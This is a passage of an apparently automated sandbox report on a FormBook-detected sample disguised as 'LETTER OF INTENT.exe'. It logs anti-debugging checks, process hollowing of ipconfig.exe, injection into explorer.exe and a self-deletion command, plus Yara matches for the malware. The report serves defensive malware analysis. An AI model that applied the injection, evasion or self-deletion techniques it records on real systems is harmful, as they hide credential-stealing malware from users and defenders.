            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F4FEC0 mov eax, dword ptr fs:[00000030h]15_2_02F4FEC0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F60EA5 mov eax, dword ptr fs:[00000030h]15_2_02F60EA5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F60EA5 mov eax, dword ptr fs:[00000030h]15_2_02F60EA5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F60EA5 mov eax, dword ptr fs:[00000030h]15_2_02F60EA5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F146A7 mov eax, dword ptr fs:[00000030h]15_2_02F146A7
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2FE87 mov eax, dword ptr fs:[00000030h]15_2_02F2FE87
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA766D mov eax, dword ptr fs:[00000030h]15_2_02EA766D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBAE73 mov eax, dword ptr fs:[00000030h]15_2_02EBAE73
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBAE73 mov eax, dword ptr fs:[00000030h]15_2_02EBAE73
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBAE73 mov eax, dword ptr fs:[00000030h]15_2_02EBAE73
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBAE73 mov eax, dword ptr fs:[00000030h]15_2_02EBAE73
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBAE73 mov eax, dword ptr fs:[00000030h]15_2_02EBAE73
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA7E41 mov eax, dword ptr fs:[00000030h]15_2_02EA7E41
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA7E41 mov eax, dword ptr fs:[00000030h]15_2_02EA7E41
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA7E41 mov eax, dword ptr fs:[00000030h]15_2_02EA7E41
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA7E41 mov eax, dword ptr fs:[00000030h]15_2_02EA7E41
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA7E41 mov eax, dword ptr fs:[00000030h]15_2_02EA7E41
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA7E41 mov eax, dword ptr fs:[00000030h]15_2_02EA7E41
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5AE44 mov eax, dword ptr fs:[00000030h]15_2_02F5AE44
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5AE44 mov eax, dword ptr fs:[00000030h]15_2_02F5AE44
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9E620 mov eax, dword ptr fs:[00000030h]15_2_02E9E620
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F4FE3F mov eax, dword ptr fs:[00000030h]15_2_02F4FE3F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9C600 mov eax, dword ptr fs:[00000030h]15_2_02E9C600
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9C600 mov eax, dword ptr fs:[00000030h]15_2_02E9C600
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9C600 mov eax, dword ptr fs:[00000030h]15_2_02E9C600
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC8E00 mov eax, dword ptr fs:[00000030h]15_2_02EC8E00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECA61C mov eax, dword ptr fs:[00000030h]15_2_02ECA61C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECA61C mov eax, dword ptr fs:[00000030h]15_2_02ECA61C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51608 mov eax, dword ptr fs:[00000030h]15_2_02F51608
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED37F5 mov eax, dword ptr fs:[00000030h]15_2_02ED37F5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F17794 mov eax, dword ptr fs:[00000030h]15_2_02F17794
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F17794 mov eax, dword ptr fs:[00000030h]15_2_02F17794
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F17794 mov eax, dword ptr fs:[00000030h]15_2_02F17794
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA8794 mov eax, dword ptr fs:[00000030h]15_2_02EA8794
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAFF60 mov eax, dword ptr fs:[00000030h]15_2_02EAFF60
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F68F6A mov eax, dword ptr fs:[00000030h]15_2_02F68F6A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAEF40 mov eax, dword ptr fs:[00000030h]15_2_02EAEF40
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E94F2E mov eax, dword ptr fs:[00000030h]15_2_02E94F2E
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E94F2E mov eax, dword ptr fs:[00000030h]15_2_02E94F2E
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECE730 mov eax, dword ptr fs:[00000030h]15_2_02ECE730
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2FF10 mov eax, dword ptr fs:[00000030h]15_2_02F2FF10
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2FF10 mov eax, dword ptr fs:[00000030h]15_2_02F2FF10
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECA70E mov eax, dword ptr fs:[00000030h]15_2_02ECA70E
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECA70E mov eax, dword ptr fs:[00000030h]15_2_02ECA70E
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F6070D mov eax, dword ptr fs:[00000030h]15_2_02F6070D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F6070D mov eax, dword ptr fs:[00000030h]15_2_02F6070D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBF716 mov eax, dword ptr fs:[00000030h]15_2_02EBF716
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16CF0 mov eax, dword ptr fs:[00000030h]15_2_02F16CF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16CF0 mov eax, dword ptr fs:[00000030h]15_2_02F16CF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16CF0 mov eax, dword ptr fs:[00000030h]15_2_02F16CF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F514FB mov eax, dword ptr fs:[00000030h]15_2_02F514FB
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F68CD6 mov eax, dword ptr fs:[00000030h]15_2_02F68CD6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA849B mov eax, dword ptr fs:[00000030h]15_2_02EA849B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB746D mov eax, dword ptr fs:[00000030h]15_2_02EB746D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2C450 mov eax, dword ptr fs:[00000030h]15_2_02F2C450
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2C450 mov eax, dword ptr fs:[00000030h]15_2_02F2C450
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECA44B mov eax, dword ptr fs:[00000030h]15_2_02ECA44B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECBC2C mov eax, dword ptr fs:[00000030h]15_2_02ECBC2C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F51C06 mov eax, dword ptr fs:[00000030h]15_2_02F51C06
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F6740D mov eax, dword ptr fs:[00000030h]15_2_02F6740D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F6740D mov eax, dword ptr fs:[00000030h]15_2_02F6740D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F6740D mov eax, dword ptr fs:[00000030h]15_2_02F6740D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16C0A mov eax, dword ptr fs:[00000030h]15_2_02F16C0A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16C0A mov eax, dword ptr fs:[00000030h]15_2_02F16C0A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16C0A mov eax, dword ptr fs:[00000030h]15_2_02F16C0A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16C0A mov eax, dword ptr fs:[00000030h]15_2_02F16C0A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F48DF1 mov eax, dword ptr fs:[00000030h]15_2_02F48DF1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAD5E0 mov eax, dword ptr fs:[00000030h]15_2_02EAD5E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAD5E0 mov eax, dword ptr fs:[00000030h]15_2_02EAD5E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5FDE2 mov eax, dword ptr fs:[00000030h]15_2_02F5FDE2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5FDE2 mov eax, dword ptr fs:[00000030h]15_2_02F5FDE2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5FDE2 mov eax, dword ptr fs:[00000030h]15_2_02F5FDE2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5FDE2 mov eax, dword ptr fs:[00000030h]15_2_02F5FDE2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16DC9 mov eax, dword ptr fs:[00000030h]15_2_02F16DC9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16DC9 mov eax, dword ptr fs:[00000030h]15_2_02F16DC9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16DC9 mov eax, dword ptr fs:[00000030h]15_2_02F16DC9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16DC9 mov ecx, dword ptr fs:[00000030h]15_2_02F16DC9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16DC9 mov eax, dword ptr fs:[00000030h]15_2_02F16DC9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F16DC9 mov eax, dword ptr fs:[00000030h]15_2_02F16DC9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC35A1 mov eax, dword ptr fs:[00000030h]15_2_02EC35A1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC1DB5 mov eax, dword ptr fs:[00000030h]15_2_02EC1DB5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC1DB5 mov eax, dword ptr fs:[00000030h]15_2_02EC1DB5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC1DB5 mov eax, dword ptr fs:[00000030h]15_2_02EC1DB5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F605AC mov eax, dword ptr fs:[00000030h]15_2_02F605AC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F605AC mov eax, dword ptr fs:[00000030h]15_2_02F605AC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E92D8A mov eax, dword ptr fs:[00000030h]15_2_02E92D8A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E92D8A mov eax, dword ptr fs:[00000030h]15_2_02E92D8A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E92D8A mov eax, dword ptr fs:[00000030h]15_2_02E92D8A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E92D8A mov eax, dword ptr fs:[00000030h]15_2_02E92D8A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E92D8A mov eax, dword ptr fs:[00000030h]15_2_02E92D8A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2581 mov eax, dword ptr fs:[00000030h]15_2_02EC2581
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2581 mov eax, dword ptr fs:[00000030h]15_2_02EC2581
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2581 mov eax, dword ptr fs:[00000030h]15_2_02EC2581
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2581 mov eax, dword ptr fs:[00000030h]15_2_02EC2581
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECFD9B mov eax, dword ptr fs:[00000030h]15_2_02ECFD9B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECFD9B mov eax, dword ptr fs:[00000030h]15_2_02ECFD9B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBC577 mov eax, dword ptr fs:[00000030h]15_2_02EBC577
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBC577 mov eax, dword ptr fs:[00000030h]15_2_02EBC577
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED3D43 mov eax, dword ptr fs:[00000030h]15_2_02ED3D43
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F13540 mov eax, dword ptr fs:[00000030h]15_2_02F13540
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F43D40 mov eax, dword ptr fs:[00000030h]15_2_02F43D40
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB7D50 mov eax, dword ptr fs:[00000030h]15_2_02EB7D50
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F68D34 mov eax, dword ptr fs:[00000030h]15_2_02F68D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F1A537 mov eax, dword ptr fs:[00000030h]15_2_02F1A537
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5E539 mov eax, dword ptr fs:[00000030h]15_2_02F5E539
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4D3B mov eax, dword ptr fs:[00000030h]15_2_02EC4D3B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4D3B mov eax, dword ptr fs:[00000030h]15_2_02EC4D3B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4D3B mov eax, dword ptr fs:[00000030h]15_2_02EC4D3B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9AD30 mov eax, dword ptr fs:[00000030h]15_2_02E9AD30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00409B30 LdrLoadDll,1_2_00409B30
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2C0000Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeMemory written: C:\Users\user\Desktop\LETTER OF INTENT.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeThread register set: target process: 3472Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3472Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1692Jump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess created: C:\Users\user\Desktop\LETTER OF INTENT.exe C:\Users\user\Desktop\LETTER OF INTENT.exeJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"Jump to behavior
            Source: explorer.exe, 00000003.00000000.257299403.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.273356119.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.270284591.0000000005EA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000003.00000000.279410188.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.263630168.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.340980854.0000000001128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeQueries volume information: C:\Users\user\Desktop\LETTER OF INTENT.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
